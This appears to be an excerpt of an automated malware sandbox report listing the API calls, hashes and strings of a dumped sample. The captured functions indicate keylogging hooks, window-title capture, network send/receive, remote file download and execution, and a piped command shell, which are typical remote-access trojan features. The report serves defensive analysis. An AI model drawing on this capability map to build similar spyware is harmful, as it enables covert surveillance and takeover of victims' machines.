                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                                                                                                                          • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                                                                                                                                          • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                                                                                                                          • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0041BB49
                                                                                                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$ForegroundText
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 29597999-0
                                                                                                                                                                                          • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                                                                                                                          • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                                                                                                                          • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                                                                                                                                          • Instruction ID: 3af98ca860494c99acd04ebe2bb4cc6dc665ec8dea8eb108ba88c8789d347e54
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9411E3B27201019FD7149B18C860BA6B766FF50710F5942AAE256CB3B2DB35EC91CA98
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00445B74: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
                                                                                                                                                                                          • _free.LIBCMT ref: 004501C0
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocateHeap_free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 614378929-0
                                                                                                                                                                                          • Opcode ID: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
                                                                                                                                                                                          • Instruction ID: 1bf88885f7a62dfe3e195aa205353632c6f85cb380d5d404dcdd82bf2c99678c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
                                                                                                                                                                                          • Instruction Fuzzy Hash: DB014976200744ABE731CF6ACC42D5AFBD8EB85370F25062EE58483281EB34A909C779
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CallNextHookEx.USER32(004750F0,?,?,?), ref: 0040A40D
                                                                                                                                                                                            • Part of subcall function 0040B681: GetKeyState.USER32(00000011), ref: 0040B686
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CallHookNextState
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3280314413-0
                                                                                                                                                                                          • Opcode ID: 2970f7ebbdaccd302bb772f11bee85fe5ca5b23e8c1d0fd462b914d7658bdec5
                                                                                                                                                                                          • Instruction ID: 50f5c0f6a1c05b17676f112507bb7a536062e5cbebe0f76c8a82f7d773b6c998
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2970f7ebbdaccd302bb772f11bee85fe5ca5b23e8c1d0fd462b914d7658bdec5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 69F0A2722043015ACA14AE699C4986B7655EB99305B00043FF642666D7CBB9DC25A29B
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                          • Opcode ID: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                                                                                                                                                          • Instruction ID: ef76d3429b2572ee2e16b707a9c356192af24cfd4e901c13b73aaad13af6506a
                                                                                                                                                                                          • Opcode Fuzzy Hash: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                                                                                                                                                          • Instruction Fuzzy Hash: BEF0B431500F65ABBF222E22AC05E5B3769DB81770B14412BB914EA286CA38FC0186AC
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                          • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                                                                                                          • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                                                                                                          • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Startup
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 724789610-0
                                                                                                                                                                                          • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                                                                                                                          • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                                                                                                                                                          • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FromGdipImageLoadStream
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3292405956-0
                                                                                                                                                                                          • Opcode ID: 622fa0b139d9c8e49d1b860aa3f0d2c71aabae9c10a97b9ae04fddd858742a73
                                                                                                                                                                                          • Instruction ID: 43760c1b0819a338a5deeaaf53a1808d78fb0d0861515ad37458d280f23f523c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 622fa0b139d9c8e49d1b860aa3f0d2c71aabae9c10a97b9ae04fddd858742a73
                                                                                                                                                                                          • Instruction Fuzzy Hash: B0D0C9B6514310AFC3619F04DC40AA2B7E8EB15312F11C82BA8D5C2620D7749C488B54
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: GdipImageSaveStream
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 971487142-0
                                                                                                                                                                                          • Opcode ID: 2b14b1dce46a2bfe4ee8223d47c11625fbcfce4f614b1a3c8f6551cdff2dc83b
                                                                                                                                                                                          • Instruction ID: 4096a07c3c24ce64e1baa665156051a68d3341f73ff607d033811f23ed9a4a9b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b14b1dce46a2bfe4ee8223d47c11625fbcfce4f614b1a3c8f6551cdff2dc83b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 12C0C932008351AB8B529F449C05C5FBAA6BB98211B044C1EF15541120CB258C659B5A
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00004C01,004758E8,00000000,00000000), ref: 00404BF8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                          • Opcode ID: 93ba778880e199ddb191fa863179a72969e2b1c83519dbb18fcdc4b7e209d100
                                                                                                                                                                                          • Instruction ID: 9d5c7c84f515cf35c3e932a45e486dbb5327be38257a8aa591cdad7e466f248e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 93ba778880e199ddb191fa863179a72969e2b1c83519dbb18fcdc4b7e209d100
                                                                                                                                                                                          • Instruction Fuzzy Hash: 22C04CF1515200BFBA00CB60CD89C37B69DD750701715C8697908D2141D576DC01D538
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Deallocatestd::_
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1323251999-0
                                                                                                                                                                                          • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                                                                          • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                                                                          • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: recv
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1507349165-0
                                                                                                                                                                                          • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                                                                                                                          • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                                                                                                                                                          • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                                                                                                                          • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: send
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2809346765-0
                                                                                                                                                                                          • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                                                                                                                          • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                                                                                                                                                          • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                                                                                                                          • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DisposeGdipImage
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1024088383-0
                                                                                                                                                                                          • Opcode ID: 0ec9bc49c4904e7bb4143567628e623777d6e2ea47272714c4fc696535c6f937
                                                                                                                                                                                          • Instruction ID: d9118485f6a3d23189d012adfd41c145ee3959ede018d2d91b25300b670f9ca3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ec9bc49c4904e7bb4143567628e623777d6e2ea47272714c4fc696535c6f937
                                                                                                                                                                                          • Instruction Fuzzy Hash: E1A001B4815601DF8F025F609A48A647FA5AB4630A3248199D4898A222D77BC857DE6A
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                          • Opcode ID: 6af9030f2851d8dba7f80d9088a7fc3807836042813ee96a264cf5191666eadb
                                                                                                                                                                                          • Instruction ID: 115d2a354d134b83122ee9a2fb556664fb1e661e2d72bfcb2989d49da4a1aa52
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6af9030f2851d8dba7f80d9088a7fc3807836042813ee96a264cf5191666eadb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 51B01270807302CBC714BF907EC666537329B1030AF10803BE20A000924A7A8CC2851F
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                          • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                                                                                                                          • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                                                                                                                                            • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                                                                                                                            • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                                                                                                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                                                                                                                            • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                                                                                                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                                                                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                                                                                                                                          • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                                                                                                                                            • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                                                                                                                                            • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                                                                                                            • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                                                                                                            • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                                                                                                                                          • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                                                                                                                                                                            • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                                                                                                          • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                                                                                                                                          • API String ID: 1067849700-181434739
                                                                                                                                                                                          • Opcode ID: 97b2096a48e92f5db4473fe00bc2ab78d1decec63ef3c371de92dd5be6838f5d
                                                                                                                                                                                          • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                                                                                                                                                          • Opcode Fuzzy Hash: 97b2096a48e92f5db4473fe00bc2ab78d1decec63ef3c371de92dd5be6838f5d
                                                                                                                                                                                          • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                                                                                                                          • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                                                                                                                                                          • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                                                                                                                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                                                                                                                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
